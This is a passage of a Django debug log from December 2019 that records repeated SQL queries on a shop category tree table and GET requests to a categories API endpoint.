"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) [19/Dec/2019 13:26:47] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:26:47,294 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:26:47,296 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:26:47,299 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:26:47,301 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:26:47,304 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:26:47,307 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:26:47,309 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:26:47,311 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:26:47,314 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:26:47,318 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:26:47,320 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:26:47,322 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:26:47,325 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:26:47,327 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:26:47,331 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:26:47,333 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:26:47,336 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:26:47,338 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:26:47,341 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:26:47,343 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:26:47,346 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:26:47,349 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:26:47,351 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:26:47,355 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:26:47,357 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:26:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:26:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:29:55,052 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:29:55,064 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:29:55,068 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 13:29:55,072 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:29:55,075 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:29:55,077 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:29:55,083 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:29:55,088 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [19/Dec/2019 13:29:55] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 13:29:55,092 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:29:55,096 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:29:55,100 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:29:55,106 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:29:55,109 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:29:55,112 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:29:55,115 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:29:55,119 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:29:55,125 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:29:55,127 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:29:55,130 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:29:55,133 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:29:55,135 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:29:55,139 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:29:55,142 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:29:55,144 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:29:55,147 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:29:55,149 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:29:55,152 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:29:55,155 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:29:55,157 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:29:55,160 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:29:55,162 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:29:55,164 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:29:55,168 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:29:55,170 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:29:55,173 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:29:55,175 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:29:55,177 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:29:55,181 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:29:55,183 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:29:55,186 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:29:55,188 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:29:55,190 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 